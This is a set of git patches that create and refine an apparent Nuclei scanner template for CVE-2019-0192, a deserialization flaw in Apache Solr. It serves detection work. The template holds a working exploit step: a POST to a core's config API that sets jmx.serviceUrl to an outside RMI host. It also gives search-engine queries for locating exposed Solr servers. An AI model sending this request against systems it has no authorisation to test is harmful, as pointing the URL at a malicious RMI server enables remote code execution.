From f105c4b1a0b48d8ef9fd224ed00b812f50136667 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 23:55:53 +0700 Subject: [PATCH 1/8] Create CVE-2019-0192.yaml /claim #10891 --- http/cves/2019/CVE-2019-0192.yaml | 49 +++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2019/CVE-2019-0192.yaml diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml new file mode 100644 index 0000000000..bbf7a0d0d8 --- /dev/null +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -0,0 +1,49 @@ +id: CVE-2019-0192 + +info: + name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr + author: hnd3884 + severity: Critical + description: | + This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + reference: + - https://github.com/Imanfeng/Apache-Solr-RCE + +http: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 + + extractors: + - type: json + name: core_name + json: + - '.status | .[].name' + internal: true + + - raw: + - | + POST /solr/{{core_name}}/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 123 + + {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + - type: word + part: body + words: + - "javax.management.remote.rmi" + extractors: + - type: regex + part: body + regex: + - "rmi://.+?:1097/obj" From 75a36a3c17830efe6861b1f793cf65efc452258f Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 17:05:58 +0000 Subject: [PATCH 2/8] update --- http/cves/2019/CVE-2019-0192.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index bbf7a0d0d8..c550dbd251 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -42,8 +42,12 @@ http: part: body words: - "javax.management.remote.rmi" + - type: status + # Some status codes we want to match + status: + - 500 extractors: - type: regex part: body regex: - - "rmi://.+?:1097/obj" + - "rmi://.+?:1097/obj" \ No newline at end of file From 3e73553f5900200fc0baafa3f780d3ca8be57a13 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 17:11:47 +0000 Subject: [PATCH 3/8] trailing space --- http/cves/2019/CVE-2019-0192.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index c550dbd251..50313fcb34 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -1,11 +1,10 @@ id: CVE-2019-0192 info: - name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr + name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr author: hnd3884 severity: Critical - description: | - This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI reference: - https://github.com/Imanfeng/Apache-Solr-RCE @@ -40,10 +39,9 @@ http: - "dns" - type: word part: body - words: + words: - "javax.management.remote.rmi" - type: status - # Some status codes we want to match status: - 500 extractors: From a41966b0699ad8825551dab0caefa033fae2beae Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 18:32:38 +0000 Subject: [PATCH 4/8] update lint --- http/cves/2019/CVE-2019-0192.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 50313fcb34..51b44bdd11 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -4,7 +4,7 @@ info: name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr author: hnd3884 severity: Critical - description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI reference: - https://github.com/Imanfeng/Apache-Solr-RCE @@ -45,7 +45,7 @@ http: status: - 500 extractors: - - type: regex - part: body - regex: - - "rmi://.+?:1097/obj" \ No newline at end of file + - type: regex + part: body + regex: + - "rmi://.+?:1097/obj" \ No newline at end of file From a89c5f92ec3942b1f4d9d89383205bc3e6cc2245 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 18:36:32 +0000 Subject: [PATCH 5/8] update lint --- http/cves/2019/CVE-2019-0192.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 51b44bdd11..023716157f 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -14,7 +14,6 @@ http: GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 - extractors: - type: json name: core_name @@ -28,9 +27,8 @@ http: Host: {{Hostname}} Content-Type: application/json Content-Length: 123 - + {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} - matchers-condition: and matchers: - type: word From 1bc896134f95c5f4c972b3b00e4dde5c6c8a87e1 Mon Sep 17 00:00:00 2001 From: Hoang Nguyen Dinh Date: Fri, 1 Nov 2024 19:13:51 +0000 Subject: [PATCH 6/8] trailing space --- http/cves/2019/CVE-2019-0192.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index 023716157f..b3a38e6ef6 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -27,7 +27,7 @@ http: Host: {{Hostname}} Content-Type: application/json Content-Length: 123 - + {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} matchers-condition: and matchers: From cc31e2c750d3ab01d8597ab83708e6a2bcf615d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 4 Nov 2024 01:16:23 +0530 Subject: [PATCH 7/8] updated template --- http/cves/2019/CVE-2019-0192.yaml | 38 ++++++++++++++++++++++--------- 1 file changed, 27 insertions(+), 11 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index b3a38e6ef6..ec61359961 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -1,19 +1,38 @@ id: CVE-2019-0192 info: - name: CVE-2019-0192 - Remote Code Execution via Unsafe Deserialization in Apache Solr + name: Apache Solr - Deserialization of Untrusted Data author: hnd3884 - severity: Critical - description: This template identifies an Apache Solr JMX Injection through the use of interactsh for out-of-band detection. The JMX injection can leads to unsafe deserialization via RMI + severity: critical + description: | + In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side. reference: - https://github.com/Imanfeng/Apache-Solr-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2019-0192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0192 + cwe-id: CWE-502 + epss-score: 0.94754 + epss-percentile: 0.99337 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: solr + shodan-query: title:"Solr" + fofa-query: title="Solr + tags: cve,cve2019,apache,solr,deserialization,rce,oast + +flow: http(1) && http(2) http: - raw: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 + extractors: - type: json name: core_name @@ -26,24 +45,21 @@ http: POST /solr/{{core_name}}/config HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 123 - {"set-property": {"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}:1097/obj"}} + {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" + - type: word part: body words: - "javax.management.remote.rmi" + - type: status status: - 500 - extractors: - - type: regex - part: body - regex: - - "rmi://.+?:1097/obj" \ No newline at end of file From b05a784d7ec1a880628e56b268b17d611c7a933c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Nov 2024 12:37:54 +0530 Subject: [PATCH 8/8] added dsl matchers --- http/cves/2019/CVE-2019-0192.yaml | 21 +++++++-------------- 1 file changed, 7 insertions(+), 14 deletions(-) diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index ec61359961..6fe747343c 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -48,18 +48,11 @@ http: {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}} - matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - "javax.management.remote.rmi" - - - type: status - status: - - 500 + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(body, "javax.management.remote.rmi")' + - 'contains(content_type, "text/plain")' + - 'status_code == 500' + condition: and